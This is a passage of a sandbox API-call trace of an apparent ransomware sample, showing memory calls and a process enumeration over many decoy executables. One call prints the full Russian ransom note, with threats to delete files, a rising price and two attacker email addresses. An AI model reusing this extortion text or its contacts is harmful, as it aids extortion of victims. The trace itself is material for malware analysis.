GlobalLock (hMem=0x450004) returned 0x56f100 [0074.831] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.831] GlobalUnlock (hMem=0x45000c) returned 0 [0074.831] GlobalHandle (pMem=0x56f100) returned 0x450004 [0074.831] GlobalUnlock (hMem=0x450004) returned 0 [0074.831] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fd10 | out: phkResult=0x18fd10*=0x0) returned 0x2 [0074.831] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0079.703] GlobalLock (hMem=0x450004) returned 0x588f38 [0079.703] GlobalHandle (pMem=0x588f38) returned 0x450004 [0079.703] GlobalUnlock (hMem=0x450004) returned 0 [0079.704] GlobalLock (hMem=0x450004) returned 0x588f38 [0079.704] GlobalLock (hMem=0x45000c) returned 0x56f100 
[0079.704] GlobalHandle (pMem=0x588f38) returned 0x450004 [0079.704] GlobalUnlock (hMem=0x450004) returned 0 [0079.704] GlobalHandle (pMem=0x56f100) returned 0x45000c [0079.704] GlobalUnlock (hMem=0x45000c) returned 0 [0079.704] GlobalLock (hMem=0x45000c) returned 0x588f38 [0079.704] GlobalHandle (pMem=0x588f38) returned 0x45000c [0079.704] GlobalUnlock (hMem=0x45000c) returned 0 [0079.704] GlobalLock (hMem=0x45000c) returned 0x588f38 [0079.704] GlobalLock (hMem=0x450004) returned 0x56f100 [0079.704] GlobalHandle (pMem=0x588f38) returned 0x45000c [0079.704] GlobalUnlock (hMem=0x45000c) returned 0 [0079.704] GlobalHandle (pMem=0x56f100) returned 0x450004 [0079.704] GlobalUnlock (hMem=0x450004) returned 0 [0079.704] GlobalLock (hMem=0x450004) returned 0x588f38 [0079.704] GlobalHandle (pMem=0x588f38) returned 0x450004 [0079.704] GlobalUnlock (hMem=0x450004) returned 0 [0079.704] GlobalLock (hMem=0x450004) returned 0x588f38 [0079.705] GlobalLock (hMem=0x45000c) returned 0x56f100 [0079.705] GlobalHandle (pMem=0x588f38) returned 0x450004 [0079.705] GlobalUnlock (hMem=0x450004) returned 0 [0079.705] GlobalHandle (pMem=0x56f100) returned 0x45000c [0079.705] GlobalUnlock (hMem=0x45000c) returned 0 [0079.705] GlobalLock (hMem=0x45000c) returned 0x588f38 [0079.705] GlobalHandle (pMem=0x588f38) returned 0x45000c [0079.705] GlobalUnlock (hMem=0x45000c) returned 0 [0079.705] GlobalLock (hMem=0x45000c) returned 0x588f38 [0079.705] GlobalLock (hMem=0x450004) returned 0x56f100 [0079.705] GlobalHandle (pMem=0x588f38) returned 0x45000c [0079.705] GlobalUnlock (hMem=0x45000c) returned 0 [0079.705] GlobalHandle (pMem=0x56f100) returned 0x450004 [0079.705] GlobalUnlock (hMem=0x450004) returned 0 [0098.608] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.608] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.608] GlobalUnlock (hMem=0x450004) returned 0 [0098.608] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.609] GlobalLock (hMem=0x45000c) returned 0x56f100 [0098.609] 
GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.609] GlobalUnlock (hMem=0x450004) returned 0 [0098.609] GlobalHandle (pMem=0x56f100) returned 0x45000c [0098.609] GlobalUnlock (hMem=0x45000c) returned 0 [0098.609] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.609] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.609] GlobalUnlock (hMem=0x45000c) returned 0 [0098.609] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.609] GlobalLock (hMem=0x450004) returned 0x56f100 [0098.609] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.610] GlobalUnlock (hMem=0x45000c) returned 0 [0098.610] GlobalHandle (pMem=0x56f100) returned 0x450004 [0098.610] GlobalUnlock (hMem=0x450004) returned 0 [0098.610] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.610] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.610] GlobalUnlock (hMem=0x450004) returned 0 [0098.610] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.610] GlobalLock (hMem=0x45000c) returned 0x56f100 [0098.610] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.610] GlobalUnlock (hMem=0x450004) returned 0 [0098.610] GlobalHandle (pMem=0x56f100) returned 0x45000c [0098.610] GlobalUnlock (hMem=0x45000c) returned 0 [0098.610] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.610] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.610] GlobalUnlock (hMem=0x45000c) returned 0 [0098.610] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.611] GlobalLock (hMem=0x450004) returned 0x56f100 [0098.611] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.611] GlobalUnlock (hMem=0x45000c) returned 0 [0098.611] GlobalHandle (pMem=0x56f100) returned 0x450004 [0098.611] GlobalUnlock (hMem=0x450004) returned 0 [0098.611] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.611] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.611] GlobalUnlock (hMem=0x450004) returned 0 [0098.611] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.611] GlobalLock (hMem=0x45000c) returned 0x56f100 [0098.611] GlobalHandle 
(pMem=0x588f38) returned 0x450004 [0098.611] GlobalUnlock (hMem=0x450004) returned 0 [0098.611] GlobalHandle (pMem=0x56f100) returned 0x45000c [0098.611] GlobalUnlock (hMem=0x45000c) returned 0 [0098.611] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.611] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.611] GlobalUnlock (hMem=0x45000c) returned 0 [0098.611] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.611] GlobalLock (hMem=0x450004) returned 0x56f100 [0098.611] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.611] GlobalUnlock (hMem=0x45000c) returned 0 [0098.612] GlobalHandle (pMem=0x56f100) returned 0x450004 [0098.612] GlobalUnlock (hMem=0x450004) returned 0 [0098.612] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.612] GlobalLock (hMem=0x45000c) returned 0x56f100 [0098.612] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.612] GlobalUnlock (hMem=0x450004) returned 0 [0098.612] GlobalHandle (pMem=0x56f100) returned 0x45000c [0098.612] GlobalUnlock (hMem=0x45000c) returned 0 [0098.612] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.612] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.612] GlobalUnlock (hMem=0x45000c) returned 0 [0098.612] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.612] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.612] GlobalUnlock (hMem=0x45000c) returned 0 [0098.613] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.613] GlobalLock (hMem=0x450004) returned 0x56f100 [0098.613] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.613] GlobalUnlock (hMem=0x45000c) returned 0 [0098.613] GlobalHandle (pMem=0x56f100) returned 0x450004 [0098.613] GlobalUnlock (hMem=0x450004) returned 0 [0098.636] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nВаши документы, фотографии, базы данных и другие важные файлы были зашифрованы. 
\r\nКаждые 24 часа удаляются 24 файла, необходимо прислать свой идентификатор чтоб мы отключили эту функцию.\r\nКаждые 24 часа стоимость расшифровки данных увеличивается на 30% (через 72 часа сумма фиксируется)\r\n\r\nДля расшифровки данных:\r\n\r\nНапишите на почту - scarry38@horsefucker.org\r\n \r\n * письме указать Ваш личный идентификатор\r\n *Прикрепите 2 файла до 1 мб для тестовой расшифровки. \r\n мы их расшифруем, в качестве доказательства, что ТОЛЬКО МЫ можем расшифровать файлы.\r\n\r\nВАЖНО! Не пишите с mail.ru (к нам не доходят пиьсма) Используйте - yandex.ru gmail.com и т.д. \r\nВсе кроме mail.ru\r\n\r\n -Чем быстрее вы сообщите нам свой идентификатор, тем быстрее мы выключим произвольное удаление файлов.\r\n -Написав нам на почту вы получите дальнейшие инструкции по оплате.\r\n\r\n ответном письме Вы получите программу для расшифровки.\r\nПосле запуска программы-дешифровщика все Ваши файлы будут восстановлены.\r\n\r\nМы гарантируем:\r\n100% успешное восстановление всех ваших файлов\r\n100% гарантию соответствия\r\n100% безопасный и надежный сервис\r\n\r\nВнимание!\r\n * Не пытайтесь удалить программу или запускать антивирусные средства\r\n * Попытки самостоятельной расшифровки файлов приведут к потере Ваших данных\r\n * Дешифраторы других пользователей несовместимы с Вашими данными, так как у каждого пользователя\r\nуникальный ключ шифрования\r\n\r\n Если вам не ответили в течении 24х часов, пишите на резервную почту - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nВаш личный идентификатор\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0098.636] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0099.011] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18e814, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 
[0099.011] RtlUnwind (TargetFrame=0x18fdec, TargetIp=0x403e04, ExceptionRecord=0x18f938, ReturnValue=0x0) [0099.017] GlobalLock (hMem=0x450004) returned 0x588f38 [0099.017] GlobalHandle (pMem=0x588f38) returned 0x450004 [0099.017] GlobalUnlock (hMem=0x450004) returned 0 [0099.017] GlobalLock (hMem=0x450004) returned 0x588f38 [0099.043] GlobalLock (hMem=0x45000c) returned 0x56f100 [0099.043] GlobalHandle (pMem=0x588f38) returned 0x450004 [0099.043] GlobalUnlock (hMem=0x450004) returned 0 [0099.043] GlobalHandle (pMem=0x56f100) returned 0x45000c [0099.043] GlobalUnlock (hMem=0x45000c) returned 0 [0099.043] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0099.048] Process32First (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.049] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.049] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.060] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.061] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.061] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.062] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.062] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.063] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.063] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0099.064] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.064] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.065] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.067] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.068] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.068] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.070] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.070] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.071] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, 
th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.071] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.072] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.072] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.073] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.073] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0099.074] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0099.075] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0099.075] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0099.076] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0099.076] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0099.077] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0099.077] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0099.078] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0099.078] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, 
cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0099.079] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0099.079] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0099.080] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0099.080] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0099.084] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0099.084] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0099.085] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | 
out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0099.085] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0099.086] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0099.086] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0099.087] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0099.087] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.088] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.088] Process32Next (in: 
hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.089] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.089] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.090] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.091] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, 